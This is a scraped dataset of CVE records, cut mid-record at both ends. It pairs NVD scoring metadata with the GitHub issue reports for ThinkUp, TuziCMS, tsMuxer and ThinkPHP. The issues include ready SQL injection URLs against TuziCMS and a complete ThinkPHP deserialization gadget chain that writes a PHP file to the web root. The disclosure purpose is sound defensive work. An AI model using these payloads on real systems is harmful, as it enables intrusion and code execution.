// line 1663 // the source will be passed in $_params['type'] to the function smarty_core_load_resource_plugin smarty_core_load_resource_plugin($_params, $this); ``` File "core.load_resource_plugin.php" ```php // line 44 // $params['type'] will be in $_plugin_file $_plugin_file = $smarty->_get_plugin_filepath('resource', $params['type']); // line 51 include_once($_plugin_file); ```
Possible Path manipulation vulnerability
https://api.github.com/repos/ThinkUpLLC/ThinkUp/issues/2289/comments
2
2021-11-10T12:15:33Z
2021-12-07T15:12:50Z
https://github.com/ThinkUpLLC/ThinkUp/issues/2289
1,049,751,211
2,289
2,831
CVE-2021-44347
2021-12-03T19:15:07.873
SQL Injection vulnerability exists in TuziCMS v2.0.6 in App\Manage\Controller\GuestbookController.class.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yeyinshi/tuzicms/issues/7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/yeyinshi/tuzicms/issues/7" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yejiao:tuzicms:2.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "8998CDEF-98D4-46B2-B8AC-72E10F37CF85", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/yeyinshi/tuzicms/issues/7
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yeyinshi", "tuzicms" ]
\App\Manage\Controller\GuestbookController.class.php line: 188-219 public function delall(){ //dump($_POST); //exit; $m=D('Guestbook'); //数据库表,配置文件中定义了表前缀,这里则不需要写 $id = I('post.id'); //dump($id); //exit; if ($id==null){ $this->error('请选择删除项!'); } //判断id是数组还是一个数值 if(is_array($id)){ $where = 'id in('.implode(',',$id).')'; //implode() 函数返回一个由数组元素组合成的字符串 }else{ $where = 'id='.$id; } //dump($where); //exit; $count=$m->where($where)->delete(); //修改表单用save函数 if ($count>0){ $this->success("成功删除{$count}条!"); } else { $this->error('批量删除失败!'); } } } This's SQLinjection POC: http://127.0.0.1/index.php/Guestbook/Index/delal POST:id=1%20and%20(extractvalue(1,concat(0x7e,(select%20user()),0x7e)))
\App\Manage\Controller\GuestbookController.class.php has SQLinjection
https://api.github.com/repos/yeyinshi/tuzicms/issues/7/comments
0
2021-11-28T13:01:01Z
2021-11-28T13:01:01Z
https://github.com/yeyinshi/tuzicms/issues/7
1,065,326,179
7
2,832
CVE-2021-35344
2021-12-03T20:15:07.627
tsMuxer v2.6.16 was discovered to contain a heap-based buffer overflow via the function BitStreamReader::getCurVal in bitStream.h.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/issues/432" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/pull/439/commits/3a889a37b5b74a45025aca13ebda394b8f706ef3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/issues/432" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/pull/439/commits/3a889a37b5b74a45025aca13ebda394b8f706ef3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tsmuxer_project:tsmuxer:2.6.16:*:*:*:*:*:*:*", "matchCriteriaId": "D9880E94-9CCB-4A6A-97BA-B6DDEB30C0B9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/justdan96/tsMuxer/issues/432
[ "Exploit", "Third Party Advisory" ]
github.com
[ "justdan96", "tsMuxer" ]
Hi, please see asan output and poc file below. Found by **Cem Onat Karagun of Diesec** As you can see on backtrace ```cpp bitStream.h:58:61 is called after HevcHdrUnit::deserialize // hevc.cpp:995:39. ``` System info: ``` Ubuntu 21.04 tsMuxeR version git-f6ab2a2 ``` To run PoC after unzip: [getCurVal_3.zip](https://github.com/justdan96/tsMuxer/files/6557051/getCurVal_3.zip) ``` $ ./tsmuxer getCurVal_3 ``` Asan output: ``` tsMuxeR version git-f6ab2a2. github.com/justdan96/tsMuxer ================================================================= ==7777==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000020fde at pc 0x00000042ca17 bp 0x7ffc8ba3e270 sp 0x7ffc8ba3e268 READ of size 1 at 0x612000020fde thread T0 #0 0x42ca16 in BitStreamReader::getCurVal(unsigned int*) /src/build/../tsMuxer/bitStream.h:58:61 #1 0x42ca16 in BitStreamReader::getBits(unsigned int) /src/build/../tsMuxer/bitStream.h:87:24 #2 0x50a120 in HevcHdrUnit::deserialize() /src/build/../tsMuxer/hevc.cpp:995:39 #3 0x52bb4a in HEVCStreamReader::checkStream(unsigned char*, int) /src/build/../tsMuxer/hevcStreamReader.cpp:88:24 #4 0x6d0b97 in METADemuxer::detectTrackReader(unsigned char*, int, AbstractStreamReader::ContainerType, int, int) /src/build/../tsMuxer/metaDemuxer.cpp:770:21 #5 0x6c7255 in METADemuxer::DetectStreamReader(BufferedReaderManager&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool) /src/build/../tsMuxer/metaDemuxer.cpp:684:35 #6 0x5df87e in detectStreamReader(char const*, MPLSParser*, bool) /src/build/../tsMuxer/main.cpp:120:34 #7 0x5efd05 in main /src/build/../tsMuxer/main.cpp:698:17 #8 0x7fe506733564 in __libc_start_main csu/../csu/libc-start.c:332:16 #9 0x2ebded in _start (/home/Fuzzer_Instance_21/txmux/tsMuxer/bin/tsMuxeR+0x2ebded) 0x612000020fde is located 0 bytes to the right of 286-byte region [0x612000020ec0,0x612000020fde) allocated by thread T0 here: #0 0x39823d in operator new[](unsigned long) (/home/Fuzzer_Instance_21/txmux/tsMuxer/bin/tsMuxeR+0x39823d) #1 0x514859 in HevcUnit::decodeBuffer(unsigned char const*, unsigned char const*) /src/build/../tsMuxer/hevc.cpp:40:19 SUMMARY: AddressSanitizer: heap-buffer-overflow /src/build/../tsMuxer/bitStream.h:58:61 in BitStreamReader::getCurVal(unsigned int*) Shadow bytes around the buggy address: 0x0c247fffc1a0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c247fffc1b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c247fffc1c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa 0x0c247fffc1d0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c247fffc1e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c247fffc1f0: 00 00 00 00 00 00 00 00 00 00 00[06]fa fa fa fa 0x0c247fffc200: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fffc210: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fffc220: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fffc230: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c247fffc240: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==7777==ABORTING ```
heap-buffer-overflow in bitStream.h:58:61
https://api.github.com/repos/justdan96/tsMuxer/issues/432/comments
0
2021-05-27T22:03:26Z
2022-06-22T21:50:03Z
https://github.com/justdan96/tsMuxer/issues/432
904,255,130
432
2,833
CVE-2021-35346
2021-12-03T20:15:07.680
tsMuxer v2.6.16 was discovered to contain a heap-based buffer overflow via the function HevcSpsUnit::short_term_ref_pic_set(int) in hevc.cpp.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/issues/436" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/pull/422/files" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/issues/436" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/justdan96/tsMuxer/pull/422/files" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tsmuxer_project:tsmuxer:2.6.16:*:*:*:*:*:*:*", "matchCriteriaId": "D9880E94-9CCB-4A6A-97BA-B6DDEB30C0B9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/justdan96/tsMuxer/issues/436
[ "Exploit", "Third Party Advisory" ]
github.com
[ "justdan96", "tsMuxer" ]
Hi, please see asan output and poc file below. Found by **Cem Onat Karagun of Diesec** As you can see on backtrace ```cpp hevc.cpp:502:37 is called after HevcSpsUnit::deserialize // hevc.cpp:872:17. ``` System info: ``` Ubuntu 21.04 tsMuxeR version git-f6ab2a2 ``` To run PoC after unzip: [short_term_1.zip](https://github.com/justdan96/tsMuxer/files/6557058/short_term_1.zip) ``` $ ./tsmuxer short_term_1 ``` Asan output: ``` tsMuxeR version git-f6ab2a2. github.com/justdan96/tsMuxer ================================================================= ==7825==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61700000dc10 at pc 0x000000510c90 bp 0x7ffd6ec5b000 sp 0x7ffd6ec5aff8 WRITE of size 1 at 0x61700000dc10 thread T0 #0 0x510c8f in HevcSpsUnit::short_term_ref_pic_set(int) /src/build/../tsMuxer/hevc.cpp:502:37 #1 0x50ce4c in HevcSpsUnit::deserialize() /src/build/../tsMuxer/hevc.cpp:872:17 #2 0x52c0c0 in HEVCStreamReader::checkStream(unsigned char*, int) /src/build/../tsMuxer/hevcStreamReader.cpp:74:24 #3 0x6d0b97 in METADemuxer::detectTrackReader(unsigned char*, int, AbstractStreamReader::ContainerType, int, int) /src/build/../tsMuxer/metaDemuxer.cpp:770:21 #4 0x6c7255 in METADemuxer::DetectStreamReader(BufferedReaderManager&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, bool) /src/build/../tsMuxer/metaDemuxer.cpp:684:35 #5 0x5df87e in detectStreamReader(char const*, MPLSParser*, bool) /src/build/../tsMuxer/main.cpp:120:34 #6 0x5efd05 in main /src/build/../tsMuxer/main.cpp:698:17 #7 0x7f70e9543564 in __libc_start_main csu/../csu/libc-start.c:332:16 #8 0x2ebded in _start (/home/Fuzzer_Instance_39/txmux/tsMuxer/bin/tsMuxeR+0x2ebded) 0x61700000dc10 is located 0 bytes to the right of 656-byte region [0x61700000d980,0x61700000dc10) allocated by thread T0 here: #0 0x39812d in operator new(unsigned long) (/home/Fuzzer_Instance_39/txmux/tsMuxer/bin/tsMuxeR+0x39812d) #1 0x50cb34 in __gnu_cxx::new_allocator<ShortTermRPS>::allocate(unsigned long, void const*) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/ext/new_allocator.h:115:27 #2 0x50cb34 in std::allocator_traits<std::allocator<ShortTermRPS> >::allocate(std::allocator<ShortTermRPS>&, unsigned long) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/bits/alloc_traits.h:460:20 #3 0x50cb34 in std::_Vector_base<ShortTermRPS, std::allocator<ShortTermRPS> >::_M_allocate(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/bits/stl_vector.h:346:20 #4 0x50cb34 in std::vector<ShortTermRPS, std::allocator<ShortTermRPS> >::_M_default_append(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/bits/vector.tcc:635:34 #5 0x50cb34 in std::vector<ShortTermRPS, std::allocator<ShortTermRPS> >::resize(unsigned long) /usr/lib/gcc/x86_64-linux-gnu/10/../../../../include/c++/10/bits/stl_vector.h:940:4 #6 0x50cb34 in HevcSpsUnit::deserialize() /src/build/../tsMuxer/hevc.cpp:869:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /src/build/../tsMuxer/hevc.cpp:502:37 in HevcSpsUnit::short_term_ref_pic_set(int) Shadow bytes around the buggy address: 0x0c2e7fff9b30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff9b40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff9b50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff9b60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff9b70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c2e7fff9b80: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2e7fff9b90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2e7fff9ba0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2e7fff9bb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2e7fff9bc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2e7fff9bd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==7825==ABORTING ```
heap-buffer-overflow in hevc.cpp:502:37
https://api.github.com/repos/justdan96/tsMuxer/issues/436/comments
0
2021-05-27T22:06:00Z
2022-06-22T21:48:20Z
https://github.com/justdan96/tsMuxer/issues/436
904,258,488
436
2,834
CVE-2021-44348
2021-12-03T20:15:07.963
SQL Injection vulnerability exists in TuziCMS v2.0.6 via the id parameer in App\Manage\Controller\AdvertController.class.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/yeyinshi/tuzicms/issues/9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/yeyinshi/tuzicms/issues/9" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yejiao:tuzicms:2.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "8998CDEF-98D4-46B2-B8AC-72E10F37CF85", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/yeyinshi/tuzicms/issues/9
[ "Third Party Advisory" ]
github.com
[ "yeyinshi", "tuzicms" ]
\App\Manage\Controller\AdvertController.class.php line: 18 - 21 public function index() { //查询指定id的栏目信息 $id=I('get.id');//类别ID $topnav=M('Adnav')->where("id=$id")->select(); POC: http://127.0.0.1/index.php/Advert/Index/Adnav?id=1%20and%20(extractvalue(1,concat(0x7e,(select%20user()),0x7e)))
\App\Manage\Controller\AdvertController.class.php has SQLinject
https://api.github.com/repos/yeyinshi/tuzicms/issues/9/comments
0
2021-11-28T13:04:16Z
2021-11-28T13:05:28Z
https://github.com/yeyinshi/tuzicms/issues/9
1,065,326,882
9
2,835
CVE-2021-44349
2021-12-03T20:15:08.017
SQL Injection vulnerability exists in TuziCMS v2.0.6 via the id parameter in App\Manage\Controller\DownloadController.class.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/yeyinshi/tuzicms/issues/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/yeyinshi/tuzicms/issues/8" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yejiao:tuzicms:2.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "8998CDEF-98D4-46B2-B8AC-72E10F37CF85", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/yeyinshi/tuzicms/issues/8
[ "Third Party Advisory" ]
github.com
[ "yeyinshi", "tuzicms" ]
\App\Manage\Controller\DownloadController.class.php line: 18 - 21 public function index(){ //查询指定id的栏目信息 $id=I('get.id');//类别ID $topcate=M('Column')->where("id=$id")->order('column_sort')->select(); POC: http://127.0.0.1/index.php/Download/Index/Column?id=1%20and%20(extractvalue(1,concat(0x7e,(select%20user()),0x7e)))
\App\Manage\Controller\DownloadController.class.php has SQLinjection
https://api.github.com/repos/yeyinshi/tuzicms/issues/8/comments
0
2021-11-28T13:02:52Z
2021-11-28T13:02:52Z
https://github.com/yeyinshi/tuzicms/issues/8
1,065,326,603
8
2,836
CVE-2021-36564
2021-12-06T21:15:07.710
ThinkPHP v6.0.8 was discovered to contain a deserialization vulnerability via the component vendor\league\flysystem-cached-adapter\src\Storage\Adapter.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/top-think/framework/issues/2559" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/top-think/framework/issues/2559" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thinkphp:thinkphp:6.0.8:*:*:*:*:*:*:*", "matchCriteriaId": "EBFE4365-93B9-448E-92B1-25ADEC4888C2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/top-think/framework/issues/2559
[ "Exploit", "Third Party Advisory" ]
github.com
[ "top-think", "framework" ]
# thinkphp6.0.8 has a unserialize vulnerability ## Vulnerability Demo Create Routing at `controller/Index.php` ```php <?php namespace app\controller; use app\BaseController; class Index extends BaseController { public function index() { if(isset($_POST['data'])){ @unserialize($_POST['data']); } } } ``` this is my poc ```php <?php namespace League\Flysystem\Cached\Storage{ use League\Flysystem\Filesystem; abstract class AbstractCache{ protected $autosave = false; } class Adapter extends AbstractCache { protected $adapter; protected $file; public function __construct(){ $this->complete = "*/<?php phpinfo();?>"; $this->expire = "yydsy4"; $this->adapter = new \League\Flysystem\Adapter\Local(); $this->file = "y4tacker.php"; } } } namespace League\Flysystem\Adapter{ class Local extends AbstractAdapter{ } abstract class AbstractAdapter{ protected $pathPrefix; public function __construct(){ $this->pathPrefix = "./"; } } } namespace { use League\Flysystem\Cached\Storage\Adapter; $a = new Adapter(); echo urlencode((serialize($a))); } ``` The file has been generated in the directory in public ![2](https://user-images.githubusercontent.com/56486273/124283829-eb998080-db7e-11eb-915c-ad92bef40ec8.png) and ![3](https://user-images.githubusercontent.com/56486273/124283887-ffdd7d80-db7e-11eb-9036-8dca1d4f2f36.png) ## Vulnerability Analysis First one starts with __destruct, autosave can be bypassed by assigning a value of true ![4](https://user-images.githubusercontent.com/56486273/124283974-1aaff200-db7f-11eb-8076-6d6f6569bb15.png) Next we call the save method, because this is an abstract class so we need to find the method that implements it ``` abstract class AbstractCache implements CacheInterface ``` Here I choose `vendor\league\flysystem-cached-adapter\src\Storage\Adapter.php` `adapter` variables are controllable and it feels like write may have a write operation so we globally search for the write method ![5](https://user-images.githubusercontent.com/56486273/124284093-374c2a00-db7f-11eb-9126-64502e8f1933.png) finally at `vendor\league\flysystem\src\Adapter\Local.php` ![6](https://user-images.githubusercontent.com/56486273/124284110-3b784780-db7f-11eb-8ff7-a7838058995d.png) The `has` method determines if the value in the `location` variable is an existing file, in order to bypass it we need a non-existent file name, the path is completely controllable ![7](https://user-images.githubusercontent.com/56486273/124284131-4206bf00-db7f-11eb-9176-a16ebab32138.png) And this one happens to have the file_put_contents method in it ![8](https://user-images.githubusercontent.com/56486273/124284164-4af79080-db7f-11eb-9f16-0d0c4e5ce640.png) The value of contents comes from what we passed in earlier and can see is `$this->getForStorage();` ![9](https://user-images.githubusercontent.com/56486273/124284193-534fcb80-db7f-11eb-89ff-37473bef2685.png) The parameters are all controllable, but we need to bypass the `json_encode` method, otherwise if we pass in escape symbols it will also output ![10](https://user-images.githubusercontent.com/56486273/124284220-5ba80680-db7f-11eb-85a6-c996ef26f7f7.png) Here I pass in `*/<?php phpinfo();? >` will be commented out in front and followed by `? >` is separated, causing the vulnerability, analysis is complete
ThinkPHP6.0.8 exists unserialize vulnerability
https://api.github.com/repos/top-think/framework/issues/2559/comments
1
2021-07-02T13:21:46Z
2021-12-11T03:14:28Z
https://github.com/top-think/framework/issues/2559
935,767,392
2,559
2,837
CVE-2021-36567
2021-12-06T21:15:07.753
ThinkPHP v6.0.8 was discovered to contain a deserialization vulnerability via the component League\Flysystem\Cached\Storage\AbstractCache.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, 